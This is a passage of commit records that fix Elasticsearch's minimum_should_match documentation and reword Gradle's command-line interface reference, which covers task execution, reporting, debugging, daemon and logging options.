kcompher\/elasticsearch,wimvds\/elasticsearch,hafkensite\/elasticsearch,queirozfcom\/elasticsearch,dongjoon-hyun\/elasticsearch,jimhooker2002\/elasticsearch,wenpos\/elasticsearch,mjason3\/elasticsearch,masaruh\/elasticsearch,AndreKR\/elasticsearch,lightslife\/elasticsearch,linglaiyao1314\/elasticsearch,pritishppai\/elasticsearch,njlawton\/elasticsearch,markllama\/elasticsearch,Kakakakakku\/elasticsearch,kaneshin\/elasticsearch,lchennup\/elasticsearch,rento19962\/elasticsearch,mjhennig\/elasticsearch,ydsakyclguozi\/elasticsearch,yuy168\/elasticsearch,sauravmondallive\/elasticsearch,maddin2016\/elasticsearch,jimhooker2002\/elasticsearch,milodky\/elasticsearch,btiernay\/elasticsearch,snikch\/elasticsearch,Kakakakakku\/elasticsearch,lzo\/elasticsearch-1,polyfractal\/elasticsearch,lightslife\/elasticsearch,luiseduardohdbackup\/elasticsearch,ZTE-PaaS\/elasticsearch,kingaj\/elasticsearch,zkidkid\/elasticsearch,truemped\/elasticsearch,zeroctu\/elasticsearch,rhoml\/elasticsearch,ouyangkongtong\/elasticsearch,spiegela\/elasticsearch,springning\/elasticsearch,vrkansagara\/elasticsearch,Fsero\/elasticsearch,ricardocerq\/elasticsearch,kaneshin\/elasticsearch,wuranbo\/elasticsearch,Rygbee\/elasticsearch,jeteve\/elasticsearch,Liziyao\/elasticsearch,pozhidaevak\/elasticsearch,pablocastro\/elasticsearch,C-Bish\/elasticsearch,likaiwalkman\/elasticsearch,markwalkom\/elasticsearch,clintongormley\/elasticsearch,MetSystem\/elasticsearch,martinstuga\/elasticsearch,iamjakob\/elasticsearch,beiske\/elasticsearch,Collaborne\/elasticsearch,Flipkart\/elasticsearch,rajanm\/elasticsearch,tsohil\/elasticsearch,jango2015\/elasticsearch,andrestc\/elasticsearch,umeshdangat\/elasticsearch,mjhennig\/elasticsearch,kunallimaye\/elasticsearch,areek\/elasticsearch,springning\/elasticsearch,cnfire\/elasticsearch-1,luiseduardohdbackup\/elasticsearch,codebunt\/elasticsearch,uschindler\/elasticsearch,Uiho\/elasticsearch,springning\/elasticsearch,pozhidaevak\/elasticsearch,caengcjd\/elasticsearch,xingguang2013\/elasticsearch,ThalaivaStars\/OrgRepo1,elancom\/elasticsearch,rmuir\/elasticsearch,djschny\/elasticsearch,NBSW\/elasticsearch,wittyameta\/elasticsearch,thecocce\/elasticsearch,lightslife\/elasticsearch,queirozfcom\/elasticsearch,wittyameta\/elasticsearch,MisterAndersen\/elasticsearch,i-am-Nathan\/elasticsearch,rento19962\/elasticsearch,areek\/elasticsearch,camilojd\/elasticsearch,hirdesh2008\/elasticsearch,uschindler\/elasticsearch,MjAbuz\/elasticsearch,MetSystem\/elasticsearch,hydro2k\/elasticsearch,khiraiwa\/elasticsearch,jsgao0\/elasticsearch,overcome\/elasticsearch,aglne\/elasticsearch,martinstuga\/elasticsearch,uschindler\/elasticsearch,Shekharrajak\/elasticsearch,lmtwga\/elasticsearch,andrejserafim\/elasticsearch,mgalushka\/elasticsearch,i-am-Nathan\/elasticsearch,alexshadow007\/elasticsearch,rhoml\/elasticsearch,wenpos\/elasticsearch,xingguang2013\/elasticsearch,mbrukman\/elasticsearch,markharwood\/elasticsearch,dataduke\/elasticsearch,strapdata\/elassandra,brandonkearby\/elasticsearch,mmaracic\/elasticsearch,lydonchandra\/elasticsearch,strapdata\/elassandra5-rc,Widen\/elasticsearch,lks21c\/elasticsearch,Flipkart\/elasticsearch,Ansh90\/elasticsearch,polyfractal\/elasticsearch,jimhooker2002\/elasticsearch,davidvgalbraith\/elasticsearch,GlenRSmith\/elasticsearch,zkidkid\/elasticsearch,dpursehouse\/elasticsearch,mbrukman\/elasticsearch,socialrank\/elasticsearch,jprante\/elasticsearch,iacdingping\/elasticsearch,alexshadow007\/elasticsearch,dataduke\/elasticsearch,overcome\/elasticsearch,wittyameta\/elasticsearch,strapdata\/elassandra-test,jw0201\/elastic,ImpressTV\/elasticsearch,LeoYao\/elasticsearch,luiseduardohdbackup\/elasticsearch,amit-shar\/elasticsearch,episerver\/elasticsearch,markharwood\/elasticsearch,szroland\/elasticsearch,ivansun1010\/elasticsearch,JSCooke\/elasticsearch,infusionsoft\/elasticsearch,JSCooke\/elasticsearch,andrestc\/elasticsearch,Charlesdong\/elasticsearch,rmuir\/elasticsearch,szroland\/elasticsearch,yongminxia\/elasticsearch,ulkas\/elasticsearch,mapr\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,mjhennig\/elasticsearch,humandb\/elasticsearch,chirilo\/elasticsearch,obourgain\/elasticsearch,sdauletau\/elasticsearch,vvcephei\/elasticsearch,yongminxia\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,rento19962\/elasticsearch,skearns64\/elasticsearch,xuzha\/elasticsearch,kevinkluge\/elasticsearch,pablocastro\/elasticsearch,avikurapati\/elasticsearch,tahaemin\/elasticsearch,Rygbee\/elasticsearch,mm0\/elasticsearch,Brijeshrpatel9\/elasticsearch,SergVro\/elasticsearch,MichaelLiZhou\/elasticsearch,adrianbk\/elasticsearch,hanswang\/elasticsearch,njlawton\/elasticsearch,xingguang2013\/elasticsearch,mkis-\/elasticsearch,LeoYao\/elasticsearch,zkidkid\/elasticsearch,humandb\/elasticsearch,kcompher\/elasticsearch,camilojd\/elasticsearch,sjohnr\/elasticsearch,StefanGor\/elasticsearch,codebunt\/elasticsearch,Helen-Zhao\/elasticsearch,yuy168\/elasticsearch,vietlq\/elasticsearch,LeoYao\/elasticsearch,MichaelLiZhou\/elasticsearch,Liziyao\/elasticsearch,nellicus\/elasticsearch,glefloch\/elasticsearch,karthikjaps\/elasticsearch,hanst\/elasticsearch,jpountz\/elasticsearch,lmtwga\/elasticsearch,kubum\/elasticsearch,yuy168\/elasticsearch,gmarz\/elasticsearch,skearns64\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,MetSystem\/elasticsearch,wimvds\/elasticsearch,micpalmia\/elasticsearch,drewr\/elasticsearch,Shekharrajak\/elasticsearch,janmejay\/elasticsearch,likaiwalkman\/elasticsearch,dantuffery\/elasticsearch,scorpionvicky\/elasticsearch,ulkas\/elasticsearch,zeroctu\/elasticsearch,linglaiyao1314\/elasticsearch,franklanganke\/elasticsearch,GlenRSmith\/elasticsearch,dataduke\/elasticsearch,luiseduardohdbackup\/elasticsearch,sscarduzio\/elasticsearch,fred84\/elasticsearch,golubev\/elasticsearch,humandb\/elasticsearch,andrestc\/elasticsearch,opendatasoft\/elasticsearch,MetSystem\/elasticsearch,Rygbee\/elasticsearch,dongjoon-hyun\/elasticsearch,Helen-Zhao\/elasticsearch,lks21c\/elasticsearch,kunallimaye\/elasticsearch,yanjunh\/elasticsearch,masterweb121\/elasticsearch,rlugojr\/elasticsearch,iamjakob\/elasticsearch,palecur\/elasticsearch,MetSystem\/elasticsearch,abibell\/elasticsearch,a2lin\/elasticsearch,koxa29\/elasticsearch,Charlesdong\/elasticsearch,kunallimaye\/elasticsearch,lydonchandra\/elasticsearch,combinatorist\/elasticsearch,loconsolutions\/elasticsearch,EasonYi\/elasticsearch,HarishAtGitHub\/elasticsearch,jaynblue\/elasticsearch,mmaracic\/elasticsearch,dpursehouse\/elasticsearch,liweinan0423\/elasticsearch,springning\/elasticsearch,ouyangkongtong\/elasticsearch,adrianbk\/elasticsearch,gingerwizard\/elasticsearch,vroyer\/elassandra,thecocce\/elasticsearch,sscarduzio\/elasticsearch,mkis-\/elasticsearch,hafkensite\/elasticsearch,karthikjaps\/elasticsearch,KimTaehee\/elasticsearch,18098924759\/elasticsearch,HonzaKral\/elasticsearch,mute\/elasticsearch,alexbrasetvik\/elasticsearch,djschny\/elasticsearch,MaineC\/elasticsearch,hydro2k\/elasticsearch,PhaedrusTheGreek\/elasticsearch,NBSW\/elasticsearch,easonC\/elasticsearch,ivansun1010\/elasticsearch,koxa29\/elasticsearch,mm0\/elasticsearch,nomoa\/elasticsearch,Charlesdong\/elasticsearch,jpountz\/elasticsearch,mrorii\/elasticsearch,rmuir\/elasticsearch,tcucchietti\/elasticsearch,HarishAtGitHub\/elasticsearch,polyfractal\/elasticsearch,diendt\/elasticsearch,schonfeld\/elasticsearch,yynil\/elasticsearch,sc0ttkclark\/elasticsearch,ricardocerq\/elasticsearch,milodky\/elasticsearch,areek\/elasticsearch,umeshdangat\/elasticsearch,amaliujia\/elasticsearch,knight1128\/elasticsearch,Helen-Zhao\/elasticsearch,snikch\/elasticsearch,luiseduardohdbackup\/elasticsearch,kalburgimanjunath\/elasticsearch,jimhooker2002\/elasticsearch,Asimov4\/elasticsearch,HarishAtGitHub\/elasticsearch,Widen\/elasticsearch,loconsolutions\/elasticsearch,hydro2k\/elasticsearch,jsgao0\/elasticsearch,cwurm\/elasticsearch,kingaj\/elasticsearch,lydonchandra\/elasticsearch,combinatorist\/elasticsearch,mnylen\/elasticsearch,franklanganke\/elasticsearch,adrianbk\/elasticsearch,bawse\/elasticsearch,HarishAtGitHub\/elasticsearch,alexbrasetvik\/elasticsearch,qwerty4030\/elasticsearch,Brijeshrpatel9\/elasticsearch,Liziyao\/elasticsearch,loconsolutions\/elasticsearch,Shepard1212\/elasticsearch,clintongormley\/elasticsearch,scorpionvicky\/elasticsearch,beiske\/elasticsearch,i-am-Nathan\/elasticsearch,JervyShi\/elasticsearch,coding0011\/elasticsearch,ckclark\/elasticsearch,thecocce\/elasticsearch,apepper\/elasticsearch,iacdingping\/elasticsearch,lzo\/elasticsearch-1,iantruslove\/elasticsearch,kimimj\/elasticsearch,kcompher\/elasticsearch,ouyangkongtong\/elasticsearch","old_file":"docs\/reference\/query-dsl\/queries\/minimum-should-match.asciidoc","new_file":"docs\/reference\/query-dsl\/queries\/minimum-should-match.asciidoc","new_contents":"[[query-dsl-minimum-should-match]]\n=== Minimum Should Match\n\nThe `minimum_should_match` parameter possible values:\n\n[cols=\"<,<,<\",options=\"header\",]\n|=======================================================================\n|Type |Example |Description\n|Integer |`3` |Indicates a fixed value regardless of the number of\noptional clauses.\n\n|Negative integer |`-2` |Indicates that the total number of optional\nclauses, minus this number should be mandatory.\n\n|Percentage |`75%` |Indicates that this percent of the total number of\noptional clauses are necessary. The number computed from the percentage\nis rounded down and used as the minimum.\n\n|Negative percentage |`-25%` |Indicates that this percent of the total\nnumber of optional clauses can be missing. The number computed from the\npercentage is rounded down, before being subtracted from the total to\ndetermine the minimum.\n\n|Combination |`3<90%` |A positive integer, followed by the less-than\nsymbol, followed by any of the previously mentioned specifiers is a\nconditional specification. It indicates that if the number of optional\nclauses is equal to (or less than) the integer, they are all required,\nbut if it's greater than the integer, the specification applies. In this\nexample: if there are 1 to 3 clauses they are all required, but for 4 or\nmore clauses only 90% are required.\n\n|Multiple combinations |`2<-25% 9<-3` |Multiple conditional\nspecifications can be separated by spaces, each one only being valid for\nnumbers greater than the one before it. In this example: if there are 1\nor 2 clauses both are required, if there are 3-9 clauses all but 25% are\nrequired, and if there are more than 9 clauses, all but three are\nrequired.\n|=======================================================================\n\n*NOTE:*\n\nWhen dealing with percentages, negative values can be used to get\ndifferent behavior in edge cases. 75% and -25% mean the same thing when\ndealing with 4 clauses, but when dealing with 5 clauses 75% means 3 are\nrequired, but -25% means 4 are required.\n\nIf the calculations based on the specification determine that no\noptional clauses are needed, the usual rules about BooleanQueries still\napply at search time (a BooleanQuery containing no required clauses must\nstill match at least one optional clause)\n\nNo matter what number the calculation arrives at, a value greater than\nthe number of optional clauses, or a value less than 1 will never be\nused. (ie: no matter how low or how high the result of the calculation\nresult is, the minimum number of required matches will never be lower\nthan 1 or greater than the number of clauses.\n","old_contents":"[[query-dsl-minimum-should-match]]\n=== Minimum Should Match\n\nThe `minimum_should_match` parameter possible values:\n\n[cols=\"<,<,<\",options=\"header\",]\n|=======================================================================\n|Type |Example |Description\n|Integer |`3` |Indicates a fixed value regardless of the number of\noptional clauses.\n\n|Negative integer |`-2` |Indicates that the total number of optional\nclauses, minus this number should be mandatory.\n\n|Percentage |`75%` |Indicates that this percent of the total number of\noptional clauses are necessary. The number computed from the percentage\nis rounded down and used as the minimum.\n\n|Negative percentage |`-25%` |Indicates that this percent of the total\nnumber of optional clauses can be missing. The number computed from the\npercentage is rounded down, before being subtracted from the total to\ndetermine the minimum.\n\n|Combination |`3<90%` |A positive integer, followed by the less-than\nsymbol, followed by any of the previously mentioned specifiers is a\nconditional specification. It indicates that if the number of optional\nclauses is equal to (or less than) the integer, they are all required,\nbut if it's greater than the integer, the specification applies. In this\nexample: if there are 1 to 3 clauses they are all required, but for 4 or\nmore clauses only 90% are required.\n\n|Multiple combinations |`2<-25 9<-3` |Multiple conditional\nspecifications can be separated by spaces, each one only being valid for\nnumbers greater than the one before it. In this example: if there are 1\nor 2 clauses both are required, if there are 3-9 clauses all but 25% are\nrequired, and if there are more than 9 clauses, all but three are\nrequired.\n|=======================================================================\n\n*NOTE:*\n\nWhen dealing with percentages, negative values can be used to get\ndifferent behavior in edge cases. 75% and -25% mean the same thing when\ndealing with 4 clauses, but when dealing with 5 clauses 75% means 3 are\nrequired, but -25% means 4 are required.\n\nIf the calculations based on the specification determine that no\noptional clauses are needed, the usual rules about BooleanQueries still\napply at search time (a BooleanQuery containing no required clauses must\nstill match at least one optional clause)\n\nNo matter what number the calculation arrives at, a value greater than\nthe number of optional clauses, or a value less than 1 will never be\nused. (ie: no matter how low or how high the result of the calculation\nresult is, the minimum number of required matches will never be lower\nthan 1 or greater than the number of clauses.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6211ec989a4f50d659b93ef1167e4558df11dcc5","subject":"Documentation rewording","message":"Documentation rewording\n\nCo-authored-by: Octavia Togami <19e24b89572cf32e772a4df489d8679fbb904d05@gmail.com>\nSigned-off-by: Marcin Mielnicki <df0fc51f55bb3fb4ccd695f6dbaea2fe3e086b4f@gmail.com>\n","repos":"blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle","old_file":"subprojects\/docs\/src\/docs\/userguide\/reference\/command_line_interface.adoc","new_file":"subprojects\/docs\/src\/docs\/userguide\/reference\/command_line_interface.adoc","new_contents":"\/\/ Copyright 2017 the original author or authors.\n\/\/\n\/\/ Licensed under the Apache License, Version 2.0 (the \"License\");\n\/\/ you may not use this file except in compliance with the License.\n\/\/ You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing, software\n\/\/ distributed under the License is distributed on an \"AS IS\" BASIS,\n\/\/ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n\/\/ See the License for the specific language governing permissions and\n\/\/ limitations under the License.\n\n[[command_line_interface]]\n= Command-Line Interface\n\n[.lead]\nThe command-line interface is one of the primary methods of interacting with Gradle. The following serves as a reference of executing and customizing Gradle use of a command-line or when writing scripts or configuring continuous integration.\n\nUse of the <<gradle_wrapper.adoc#gradle_wrapper, Gradle Wrapper>> is highly encouraged. You should substitute `.\/gradlew` or `gradlew.bat` for `gradle` in all following examples when using the Wrapper.\n\nExecuting Gradle on the command-line conforms to the following structure. Options are allowed before and after task names.\n----\ngradle [taskName...] [--option-name...]\n----\n\nIf multiple tasks are specified, they should be separated with a space.\n\nOptions that accept values can be specified with or without `=` between the option and argument; however, use of `=` is recommended.\n----\n--console=plain\n----\n\nOptions that enable behavior have long-form options with inverses specified with `--no-`. The following are opposites.\n----\n--build-cache\n--no-build-cache\n----\n\nMany long-form options, have short option equivalents. The following are equivalent:\n----\n--help\n-h\n----\n\n[NOTE]\n====\nMany command-line flags can be specified in `gradle.properties` to avoid needing to be typed. See the <<build_environment.adoc#sec:gradle_configuration_properties, configuring build environment guide>> for details.\n====\n\nThe following sections describe use of the Gradle command-line interface, grouped roughly by user goal. Some plugins also add their own command line options, for example <<java_testing.adoc#test_filtering,`--tests` for Java test filtering>>. For more information on exposing command line options for your own tasks, see <<custom_tasks.adoc#sec:declaring_and_using_command_line_options,Declaring and using command-line options>>.\n\n[[sec:command_line_executing_tasks]]\n== Executing tasks\n\nYou can learn about what projects and tasks are available in the <<#sec:command_line_project_reporting, project reporting section>>.\nMost builds support a common set of tasks known as <<more_about_tasks#sec:lifecycle_tasks,_lifecycle tasks_>>. These include the `build`, `assemble`, and `check` tasks.\n\nIn order to execute a task called \"myTask\" on the root project, type:\n----\n$ gradle :myTask\n----\n\nThis will run the single \"myTask\" and also all of its <<tutorial_using_tasks.adoc#sec:task_dependencies,task dependencies>>.\n\n[[executing_tasks_in_multi_project_builds]]\n=== Executing tasks in multi-project builds\n\nIn a <<intro_multi_project_builds.adoc#intro_multi_project_builds, multi-project build>>, subproject tasks can be executed with \":\" separating subproject name and task name.\nThe following are equivalent _when run from the root project_:\n----\n$ gradle :my-subproject:taskName\n$ gradle my-subproject:taskName\n----\n\nYou can also run a task for _all_ subprojects by using a task _selector_ that consists of the task name only.\nFor example, this will run the \"test\" task for all subprojects when invoked from the root project directory:\n----\n$ gradle test\n----\n\n[NOTE]\n====\nSome tasks selectors, like `help` or `dependencies`, will only run the task on the project they are invoked on and not on all the subprojects.\nThe main motivation for this is that these tasks print out information that would be hard to process if it combined the information from all projects.\n====\n\nWhen invoking Gradle from within a subproject, the project name should be omitted:\n----\n$ cd my-subproject\n$ gradle taskName\n----\n\n[NOTE]\n====\nWhen executing the Gradle Wrapper from subprojects, one must reference `gradlew` relatively. For example: `..\/gradlew taskName`. The community http:\/\/www.gdub.rocks\/[gdub project] aims to make this more convenient.\n====\n\n=== Executing multiple tasks\nYou can also specify multiple tasks. For example, the following will execute the `test` and `deploy` tasks in the order that they are listed on the command-line and will also execute the dependencies for each task.\n\n----\n$ gradle test deploy\n----\n\n[[sec:excluding_tasks_from_the_command_line]]\n=== Excluding tasks from execution\nYou can exclude a task from being executed using the `-x` or `--exclude-task` command-line option and providing the name of the task to exclude.\n\n.Simple Task Graph\nimage::commandLineTutorialTasks.png[]\n\n.Excluding tasks\n----\n$ gradle dist --exclude-task test\ninclude::{snippetsPath}\/tutorial\/excludeTasks\/tests\/excludeTask.out[]\n----\n\nYou can see that the `test` task is not executed, even though it is a dependency of the `dist` task. The `test` task's dependencies such as `compileTest` are not executed either. Those dependencies of `test` that are required by another task, such as `compile`, are still executed.\n\n[[sec:rerun_tasks]]\n=== Forcing tasks to execute\n\nYou can force Gradle to execute all tasks ignoring <<more_about_tasks.adoc#sec:up_to_date_checks,up-to-date checks>> using the `--rerun-tasks` option:\n\n----\n$ gradle test --rerun-tasks\n----\n\nThis will force `test` and _all_ task dependencies of `test` to execute. It's a little like running `gradle clean test`, but without the build's generated output being deleted.\n\n[[sec:continue_build_on_failure]]\n=== Continuing the build when a failure occurs\n\nBy default, Gradle will abort execution and fail the build as soon as any task fails. This allows the build to complete sooner, but hides other failures that would have occurred. In order to discover as many failures as possible in a single build execution, you can use the `--continue` option.\n\n----\n$ gradle test --continue\n----\n\nWhen executed with `--continue`, Gradle will execute _every_ task to be executed where all of the dependencies for that task completed without failure, instead of stopping as soon as the first failure is encountered. Each of the encountered failures will be reported at the end of the build.\n\nIf a task fails, any subsequent tasks that were depending on it will not be executed. For example, tests will not run if there is a compilation failure in the code under test; because the test task will depend on the compilation task (either directly or indirectly).\n\n[[sec:name_abbreviation]]\n=== Name abbreviation\n\nWhen you specify tasks on the command-line, you don\u2019t have to provide the full name of the task. You only need to provide enough of the task name to uniquely identify the task. For example, it's likely `gradle che` is enough for Gradle to identify the `check` task.\n\nThe same applies for project names. You can execute the `check` task in the `library` subproject with the `gradle lib:che` command.\n\nYou can use https:\/\/en.wikipedia.org\/wiki\/Camel_case[camel case] patterns for more complex abbreviations. These patterns are expanded to match camel case and https:\/\/en.wikipedia.org\/wiki\/Kebab_case[kebab case] names. For example the pattern `foBa` (or even `fB`) matches `fooBar` and `foo-bar`.\n\nMore concretely, you can run the `compileTest` task in the `my-awesome-library` subproject with the `gradle mAL:cT` command.\n\n.Abbreviated project and task names\n----\n$ gradle mAL:cT\ninclude::{snippetsPath}\/tutorial\/nameMatching\/tests\/nameMatching.out[]\n----\n\nYou can also use these abbreviations with the -x command-line option.\n\n== Common tasks\n\nThe following are task conventions applied by built-in and most major Gradle plugins.\n\n=== Computing all outputs\n\nIt is common in Gradle builds for the `build` task to designate assembling all outputs and running all checks.\n\n----\n$ gradle build\n----\n\n=== Running applications\n\nIt is common for applications to be run with the `run` task, which assembles the application and executes some script or binary.\n\n----\n$ gradle run\n----\n\n=== Running all checks\n\nIt is common for _all_ verification tasks, including tests and linting, to be executed using the `check` task.\n\n----\n$ gradle check\n----\n\n=== Cleaning outputs\n\nYou can delete the contents of the build directory using the `clean` task, though doing so will cause pre-computed outputs to be lost, causing significant additional build time for the subsequent task execution.\n\n----\n$ gradle clean\n----\n\n[[sec:command_line_project_reporting]]\n== Project reporting\n\nGradle provides several built-in tasks which show particular details of your build. This can be useful for understanding the structure and dependencies of your build, and for debugging problems.\n\nYou can get basic help about available reporting options using `gradle help`.\n\n=== Listing projects\n\nRunning `gradle projects` gives you a list of the sub-projects of the selected project, displayed in a hierarchy.\n\n----\n$ gradle projects\n----\n\nYou also get a project report within build scans. Learn more about https:\/\/scans.gradle.com\/[creating build scans].\n\n[[sec:listing_tasks]]\n=== Listing tasks\n\nRunning `gradle tasks` gives you a list of the main tasks of the selected project. This report shows the default tasks for the project, if any, and a description for each task.\n\n----\n$ gradle tasks\n----\n\nBy default, this report shows only those tasks which have been assigned to a task group. You can obtain more information in the task listing using the `--all` option.\n\n----\n$ gradle tasks --all\n----\n\nIf you need to be more precise, you can display only the tasks from a specific group using the `--group` option.\n\n----\n$ gradle tasks --group=\"build setup\"\n----\n\n[[sec:show_task_details]]\n=== Show task usage details\n\nRunning `gradle help --task someTask` gives you detailed information about a specific task.\n\n.Obtaining detailed help for tasks\n----\n$ gradle -q help --task libs\ninclude::{snippetsPath}\/tutorial\/projectReports\/tests\/taskHelp.out[]\n----\n\nThis information includes the full task path, the task type, possible command line options and the description of the given task.\n\n=== Reporting dependencies\n\nBuild scans give a full, visual report of what dependencies exist on which configurations, transitive dependencies, and dependency version selection.\n\n----\n$ gradle myTask --scan\n----\n\nThis will give you a link to a web-based report, where you can find dependency information like this.\n\nimage::gradle-core-test-build-scan-dependencies.png[Build Scan dependencies report]\n\nLearn more in <<viewing_debugging_dependencies.adoc#viewing-debugging-dependencies,Viewing and debugging dependencies>>.\n\n=== Listing project dependencies\n\nRunning `gradle dependencies` gives you a list of the dependencies of the selected project, broken down by configuration. For each configuration, the direct and transitive dependencies of that configuration are shown in a tree. Below is an example of this report:\n\n----\n$ gradle dependencies\n----\n\nConcrete examples of build scripts and output available in the <<viewing_debugging_dependencies.adoc#viewing-debugging-dependencies,Viewing and debugging dependencies>>.\n\nRunning `gradle buildEnvironment` visualises the buildscript dependencies of the selected project, similarly to how `gradle dependencies` visualizes the dependencies of the software being built.\n\n----\n$ gradle buildEnvironment\n----\n\nRunning `gradle dependencyInsight` gives you an insight into a particular dependency (or dependencies) that match specified input.\n\n----\n$ gradle dependencyInsight\n----\n\nSince a dependency report can get large, it can be useful to restrict the report to a particular configuration. This is achieved with the optional `--configuration` parameter:\n\n[[sec:listing_properties]]\n=== Listing project properties\n\nRunning `gradle properties` gives you a list of the properties of the selected project.\n\n.Information about properties\n----\n$ gradle -q api:properties\ninclude::{snippetsPath}\/tutorial\/projectReports\/tests\/propertyListReport.out[]\n----\n\n[[sec:command_line_completion]]\n== Command-line completion\n\nGradle provides bash and zsh tab completion support for tasks, options, and Gradle properties through https:\/\/github.com\/gradle\/gradle-completion[gradle-completion], installed separately.\n\n.Gradle Completion\nimage::gradle-completion-4.0.gif[]\n\n[[sec:command_line_debugging]]\n== Debugging options\n\n`-?`, `-h`, `--help`::\nShows a help message with all available CLI options.\n\n`-v`, `--version`::\nPrints Gradle, Groovy, Ant, JVM, and operating system version information.\n\n`-S`, `--full-stacktrace`::\nPrint out the full (very verbose) stacktrace for any exceptions. See also <<#sec:command_line_logging, logging options>>.\n\n`-s`, `--stacktrace`::\nPrint out the stacktrace also for user exceptions (e.g. compile error). See also <<#sec:command_line_logging, logging options>>.\n\n`--scan`::\nCreate a https:\/\/gradle.com\/build-scans[build scan] with fine-grained information about all aspects of your Gradle build.\n\n`-Dorg.gradle.debug=true`::\nDebug Gradle client (non-Daemon) process. Gradle will wait for you to attach a debugger at `localhost:5005` by default.\n\n`-Dorg.gradle.debug.port=(port number)`::\nSpecifies the port number to listen on when debug is enabled. _Default is `5005`._\n\n`-Dorg.gradle.debug.server=true`::\nIf set to `true` and debugging is enabled, Gradle will run the build with the socket-attach mode of the debugger. Otherwise, the socket-listen mode is used.\n\n`-Dorg.gradle.debug.suspend=true`::\nWhen set to `true` and debugging is enabled, the JVM running Gradle will suspend until a debugger is attached.\n\n`-Dorg.gradle.daemon.debug=true`::\nDebug <<gradle_daemon.adoc#gradle_daemon, Gradle Daemon>> process.\n\n[[sec:command_line_performance]]\n== Performance options\nTry these options when optimizing build performance. Learn more about <<performance.adoc#performance_gradle,improving performance of Gradle builds here>>.\n\nMany of these options can be specified in `gradle.properties` so command-line flags are not necessary. See the <<build_environment.adoc#sec:gradle_configuration_properties, configuring build environment guide>>.\n\n`--build-cache`, `--no-build-cache`::\nToggles the <<build_cache.adoc#build_cache, Gradle build cache>>. Gradle will try to reuse outputs from previous builds. _Default is off_.\n\n`--configure-on-demand`, `--no-configure-on-demand`::\nToggles <<multi_project_configuration_and_execution.adoc#sec:configuration_on_demand, Configure-on-demand>>. Only relevant projects are configured in this build run. _Default is off_.\n\n`--max-workers`::\nSets maximum number of workers that Gradle may use. _Default is number of processors_.\n\n`--parallel`, `--no-parallel`::\nBuild projects in parallel. For limitations of this option, see <<multi_project_configuration_and_execution.adoc#sec:parallel_execution, Parallel Project Execution>>. _Default is off_.\n\n`--priority`::\nSpecifies the scheduling priority for the Gradle daemon and all processes launched by it. Values are `normal` or `low`. _Default is normal_.\n\n`--profile`::\nGenerates a high-level performance report in the `$buildDir\/reports\/profile` directory. `--scan` is preferred.\n\n`--scan`::\nGenerate a build scan with detailed performance diagnostics.\n\nimage::gradle-core-test-build-scan-performance.png[Build Scan performance report]\n\n`--watch-fs`, `--no-watch-fs`::\nToggles <<gradle_daemon.adoc#sec:daemon_watch_fs,watching the file system>>.\nWhen enabled Gradle re-uses information it collects about the file system between builds.\n_Enabled by default on operating systems where Gradle supports this feature._\n\n=== Gradle daemon options\nYou can manage the <<gradle_daemon.adoc#gradle_daemon,Gradle Daemon>> through the following command line options.\n\n`--daemon`, `--no-daemon`::\nUse the <<gradle_daemon.adoc#gradle_daemon, Gradle Daemon>> to run the build. Starts the daemon if not running or existing daemon busy. _Default is on_.\n\n`--foreground`::\nStarts the Gradle Daemon in a foreground process.\n\n`--status` (Standalone command)::\nRun `gradle --status` to list running and recently stopped Gradle daemons. Only displays daemons of the same Gradle version.\n\n`--stop` (Standalone command)::\nRun `gradle --stop` to stop all Gradle Daemons of the same version.\n\n`-Dorg.gradle.daemon.idletimeout=(number of milliseconds)`::\nGradle Daemon will stop itself after this number of milliseconds of idle time. _Default is 10800000_ (3 hours).\n\n\n[[sec:command_line_logging]]\n== Logging options\n\n=== Setting log level\nYou can customize the verbosity of Gradle logging with the following options, ordered from least verbose to most verbose. Learn more in the <<logging.adoc#logging, logging documentation>>.\n\n`-Dorg.gradle.logging.level=(quiet,warn,lifecycle,info,debug)`::\nSet logging level via Gradle properties.\n\n`-q`, `--quiet`::\nLog errors only.\n\n`-w`, `--warn`::\nSet log level to warn.\n\n`-i`, `--info`::\nSet log level to info.\n\n`-d`, `--debug`::\nLog in debug mode (includes normal stacktrace).\n\nLifecycle is the default log level.\n\n[[sec:command_line_customizing_log_format]]\n=== Customizing log format\nYou can control the use of rich output (colors and font variants) by specifying the \"console\" mode in the following ways:\n\n`-Dorg.gradle.console=(auto,plain,rich,verbose)`::\nSpecify console mode via Gradle properties. Different modes described immediately below.\n\n`--console=(auto,plain,rich,verbose)`::\nSpecifies which type of console output to generate.\n+\nSet to `plain` to generate plain text only. This option disables all color and other rich output in the console output. This is the default when Gradle is _not_ attached to a terminal.\n+\nSet to `auto` (the default) to enable color and other rich output in the console output when the build process is attached to a console, or to generate plain text only when not attached to a console. _This is the default when Gradle is attached to a terminal._\n+\nSet to `rich` to enable color and other rich output in the console output, regardless of whether the build process is not attached to a console. When not attached to a console, the build output will use ANSI control characters to generate the rich output.\n+\nSet to `verbose` to enable color and other rich output like the `rich`, but output task names and outcomes at the lifecycle log level, as is done by default in Gradle 3.5 and earlier.\n\n[[sec:command_line_warnings]]\n=== Showing or hiding warnings\nBy default, Gradle won't display all warnings (e.g. deprecation warnings). Instead, Gradle will collect them and render a summary at the end of the build like:\n\n----\nDeprecated Gradle features were used in this build, making it incompatible with Gradle 5.0.\n----\n\nYou can control the verbosity of warnings on the console with the following options:\n\n`-Dorg.gradle.warning.mode=(all,fail,none,summary)`::\nSpecify warning mode via <<build_environment.adoc#sec:gradle_configuration_properties, Gradle properties>>. Different modes described immediately below.\n\n`--warning-mode=(all,fail,none,summary)`::\nSpecifies how to log warnings. Default is `summary`.\n+\nSet to `all` to log all warnings.\n+\nSet to `fail` to log all warnings and fail the build if there are any warnings.\n+\nSet to `summary` to suppress all warnings and log a summary at the end of the build.\n+\nSet to `none` to suppress all warnings, including the summary 